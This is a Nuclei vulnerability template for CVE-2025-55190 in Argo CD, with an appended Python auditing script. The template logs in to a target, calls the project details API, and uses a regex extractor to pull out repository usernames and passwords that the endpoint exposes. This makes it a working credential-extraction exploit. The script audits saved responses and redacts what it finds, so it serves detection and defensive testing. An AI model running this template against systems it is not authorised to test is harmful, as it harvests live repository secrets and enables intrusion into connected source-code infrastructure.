Argo CD API tokens with project-level permissions are able to retrieve sensitive repository credentials
(usernames, passwords) through the project details API endpoint, even when the token only has standard
application management permissions and no explicit access to secrets. This vulnerability affects versions
v2.2.0-rc1 and later, including 2.13.0 through 2.13.8, 2.14.0 through 2.14.15, 3.0.0 through 3.0.12,
and 3.1.0-rc1 through 3.1.1. Any token with project get permissions is vulnerable, including global permissions.
Note: This template requires valid ArgoCD credentials (username/password) to test the vulnerability.
PoC code [public]
id: CVE-2025-55190

info:
  name: ArgoCD Project API Token Repository Credentials Exposure
  author: nukunga[seunghyeonJeon]
  severity: critical
  description: |
    Argo CD API tokens with project-level permissions are able to retrieve sensitive repository credentials
    (usernames, passwords) through the project details API endpoint, even when the token only has standard
    application management permissions and no explicit access to secrets. This vulnerability affects versions
    v2.2.0-rc1 and later, including 2.13.0 through 2.13.8, 2.14.0 through 2.14.15, 3.0.0 through 3.0.12,
    and 3.1.0-rc1 through 3.1.1. Any token with project get permissions is vulnerable, including global permissions.
    Note: This template requires valid ArgoCD credentials (username/password) to test the vulnerability.
  reference:
    - https://github.com/argoproj/argo-cd/security/advisories/GHSA-786q-9hcg-v9ff
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55190
    - https://github.com/argoproj/argo-cd/commit/e8f86101f5378662ae6151ce5c3a76e9141900e8
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2025-55190
    epss-score: 0.06081
    epss-percentile: 0.90348
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.title:"argo cd"
  tags: cve,cve2025,argocd,credentials,exposure,gitops,kubernetes

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  # Request 1: log in with the supplied credentials and keep the session token.
  - raw:
      - |
        POST /api/v1/session HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    extractors:
      - type: json
        name: token
        part: body
        internal: true
        json:
          - '.token'

  # Request 2: fetch the detailed view of the default project with that token.
  - raw:
      - |
        GET /api/v1/projects/default/detailed HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Content-Type: application/json

    # Match only when all three key names appear in a 200 response.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"repositories":'
          - '"username":'
          - '"password":'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: exposed_credentials
        part: body
        group: 1
        regex:
          - '"repositories":\[.*?"username":"([^"]+)".*?"password":"([^"]+)"'
# digest: 4a0a00473045022100926acca725a4d7ae5b6f445ddc420cb328ec0cb7cf7910f2fdb44fbd3705727e022064683bae7c862ac9612576dd3683955da36a799d1edfff1ed9d9583d730a4ac1:922c64590222798bb761d5b6d8e72950
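
The following is an added example, not part of the template or of Argo CD's own code: a structured check of a saved response body from the project details endpoint, useful for confirming on your own instance that an upgrade removed the exposure. It tests credential values rather than key names and reports them redacted; the function names, the `repo` field and the sample bodies are assumptions constructed for illustration.

```python
import json

# Credential fields named by the template's matchers.
CREDENTIAL_KEYS = ("username", "password")


def redact(value):
    """Keep only the length so a finding can be logged without the secret."""
    return f"<redacted, {len(value)} chars>"


def audit_project_response(body):
    """Return one finding per "repositories" entry with non-empty credentials."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError as exc:
        raise ValueError(f"response is not JSON: {exc}") from exc
    if not isinstance(doc, dict):
        raise ValueError("response is not a JSON object")

    repos = doc.get("repositories")
    findings = []
    for index, entry in enumerate(repos if isinstance(repos, list) else []):
        if not isinstance(entry, dict):
            continue
        exposed = {
            key: redact(entry[key])
            for key in CREDENTIAL_KEYS
            if isinstance(entry.get(key), str) and entry[key]
        }
        if exposed:
            # "repo" as the URL field is an assumption about the response shape.
            repo = entry.get("repo", "<unknown>")
            findings.append({"index": index, "repo": repo, "exposed": exposed})
    return findings


# Constructed sample bodies, not captured from a real server.
SAMPLE_EXPOSED = json.dumps({"repositories": [
    {"repo": "https://git.example.invalid/team/app.git",
     "username": "ci-bot", "password": "s3cr3t-value"},
    {"repo": "https://git.example.invalid/team/public.git",
     "username": "", "password": ""},
]})
SAMPLE_CLEAN = json.dumps({"repositories": [{"repo": "https://git.example.invalid/team/app.git"}]})

if __name__ == "__main__":
    for name, body in (("exposed", SAMPLE_EXPOSED), ("clean", SAMPLE_CLEAN)):
        print(name, audit_project_response(body))
```

Any finding on a live instance means the repository credentials shown should be rotated after upgrading.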